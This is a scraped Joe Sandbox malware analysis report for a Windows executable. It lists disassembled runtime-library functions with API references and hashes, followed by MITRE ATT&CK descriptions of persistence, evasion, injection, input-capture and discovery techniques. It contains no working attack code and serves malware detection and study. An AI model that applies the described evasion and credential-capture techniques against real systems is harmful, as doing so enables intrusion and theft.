Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
Instruction ID: dff0b9cac6ede44f8ec709af540abcc6cfaaef23b490fa9d951451b010822e2b
Opcode Fuzzy Hash: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
Instruction Fuzzy Hash: 60017236600155BBCF231F56DC08D9F3E67FBD97A5B546024FE1555220C731C862E7A1

Function 00671C22 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000), ref: 00671C39
GetLastError.KERNEL32(?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?,?,00662FEE,00000000), ref: 00671C45

Part of subcall function 00671C0B: CloseHandle.KERNEL32(FFFFFFFE,00671C55,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?), ref: 00671C1B

___initconout.LIBCMT ref: 00671C55

Part of subcall function 00671BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00671BFC,0066E98C,?,?,00662A14,?,00000000,00000000,?), ref: 00671BE0

WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?), ref: 00671C6A

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
Instruction ID: af2f14e9fee3c8f912861ca6fa16226ec524f9f9829eb3809ce26e06098267bd
Opcode Fuzzy Hash: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
Instruction Fuzzy Hash: 08F01C36140129BBCF226FD9DC08A893F27FB0A3A1F008119FA1D99620C632C9609B90

Function 005E2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 005E2F43

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
Instruction ID: 0572a0fc90abdac97d34035cbdb5c0b3affa57a6f1548e447d6c34aa93b5a78a
Opcode Fuzzy Hash: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
Instruction Fuzzy Hash: 16E1F571A001459FCB18DF69C885A6DBBB9FF88310F24836AE859DB395E730ED41CB90

Function 00578080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0057844D

Strings

ror, xrefs: 005780D4
parse error, xrefs: 00578149, 00578162

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
Instruction ID: 80d1fa4a4c241bb656b9895fb3e782abb6bb315f31c8fd7d556fcef8972cf41b
Opcode Fuzzy Hash: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
Instruction Fuzzy Hash: A4C10671D106498FEB08CF68DC88BADBB72BF55304F14C24DE008AB792DBB49684DB91

Function 00577DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00578051
___std_exception_destroy.LIBVCRUNTIME ref: 00578060

Strings

[json.exception., xrefs: 00577E1C

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
Instruction ID: daa32e71712766b3de9640baf24465b9050d8dad48f228090f175965fddd81bc
Opcode Fuzzy Hash: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
Instruction Fuzzy Hash: 3B9116709002089FDB18CFA8DC89BAEBFB6FF45314F14825DE404AB792D774AA84D791

Function 00573A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00573C0F

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

Strings

ios_base::failbit set, xrefs: 00573AC8
ios_base::badbit set, xrefs: 00573BA7, 00573BD2, 00573BF3

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
Instruction ID: c8043547520b72f85efa22c8b1e067a8f09e83ca2d5cc74fb0b1df1e2a57f2dd
Opcode Fuzzy Hash: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
Instruction Fuzzy Hash: 9841F4B1910204ABC704DF68DC45BAAFBB9FF45320F14C21EF91C9B681E770AA40DBA1

Function 00576330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

___std_fs_directory_iterator_open@12.LIBCPMT ref: 0057644F
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0057646A

Strings

exists, xrefs: 00576366

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID: exists
API String ID: 1297148070-2996790960
Opcode ID: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
Instruction ID: b4c556fd099329a27958afa6282edcfba7e9ccc4cf8f1af42ebec8bbe268ecf3
Opcode Fuzzy Hash: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
Instruction Fuzzy Hash: 5641F372900604ABCF10DF59DD85BAAFBB9FB44720F048269EC18A3781EB356D14DBE1

Function 005E45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005E4E29
___std_exception_destroy.LIBVCRUNTIME ref: 005E4E42
___std_exception_destroy.LIBVCRUNTIME ref: 005E594D
___std_exception_destroy.LIBVCRUNTIME ref: 005E5966

Strings

value, xrefs: 005E5873

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
Instruction ID: 9c57c5b074271b6f6070b71f4fb255c1ef998c92ed2daac337d17cfb051f85f3
Opcode Fuzzy Hash: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
Instruction Fuzzy Hash: CE51A070C00298DBDB18DFA4CC99BDEBFB5BF15314F148259E445AB382D7746A88CB52

Function 005E99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 005E99F1

Strings

type must be string, but is , xrefs: 005E9A58
type must be boolean, but is , xrefs: 005E9AE2

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
Instruction ID: ef2bd2446b03d87dde9322ec38de9630bd514c597b0317076d13db0be612664f
Opcode Fuzzy Hash: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
Instruction Fuzzy Hash: 2F3160B19041489FC718EBA4D846BAE7BA9FF45300F10417AF419D77C2EB35AE04C792

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Lisect_AVT_24003_G1A_89.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

